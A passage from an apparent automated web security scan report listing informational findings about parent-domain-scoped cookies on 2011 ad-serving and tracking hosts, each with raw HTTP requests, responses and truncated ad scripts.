13.17. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K05539 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; 
rsi_us_1000000="...[SNIP]..."; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; udm_0=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; 
rsi_segs_1000000=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; rtc_8mNC=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UVQe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UVQe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_e91p="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:38 GMT
Content-Length: 2299

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.18. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1009698-621393-665981-1268392-317325-1198035-1049794-1238051-481602-185980-770484-757774-74560-1086373-1196055-1086372-1264419-593881-1215295-1236954-1086371-1086370-1086369-926097-1236953-1196051-1236950-1236951-1147048-107089-1049851-1096152-1063912-1166710-1063916-1063911-1063910-1215322-1009546-715901-1023315-715883-725071-109108-75921-1081817-1006093-86237-1006089-1009578-1049785-1191521-1201817-1086731-641525-1049788-124865-1284585-1086733-1077940-1044410-1093100-613349-1010298-397181-1009462-397180-1044578-1010301-1041270-1020427-1093092-1093093-1049769-1049770-596293-576685-596292-1049772-1044587-596291 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; 
udm_0=...[SNIP]...; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; 
rtc_d44E=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; rsiPus__uYS="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"; rsi_us_1000000="...[SNIP]..."

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__uYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__uYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gHx8="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:03:11 GMT

GIF89a.............!.......,...........D..;

13.19. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=E05510 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_6SVK=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; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_hjCW="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"; 
rsi_us_1000000="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"; udm_0=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hjCW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hjCW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_G9_S="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:25 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.20. http://ads1.revenue.net/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 331

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/2
...[SNIP]...

13.21. http://ads1.revenue.net/load/227245/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /load/227245/index.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/227245/index.html?O_R_NUM=58437537&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169& HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CABx2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDU1RAWwAQQwMTM1MTotKQQABzEzMDUyMDEzNTERAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:02 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDU2MjoxsAEEMDEzNjI6LSkEAIwEmgJ8dnQEIAdNATVUDydOATUxKUQBCS06MTMwNTIwMTM2MhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 0


13.22. http://akatracking.esearchvision.com/esi/redirect.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esi/redirect.html?esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://akatracking.esearchvision.com/esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1
Set-Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
ETag: "c442c4a32adbd04908e9fed8cf5e4aff:1203522432"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=77115
Date: Thu, 12 May 2011 11:01:11 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13.23. http://akatracking.esearchvision.com/esi/redirect2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akatracking.esearchvision.com
Path:   /esi/redirect2.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34120
Date: Thu, 12 May 2011 11:01:11 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13.24. http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/15917-119013-26745-9

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/15917-119013-26745-9?mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Sun, 12-May-2013 4:51:06 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f
Content-Length: 0
Date: Thu, 12 May 2011 11:39:07 GMT


13.25. http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d908257/6/911744/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

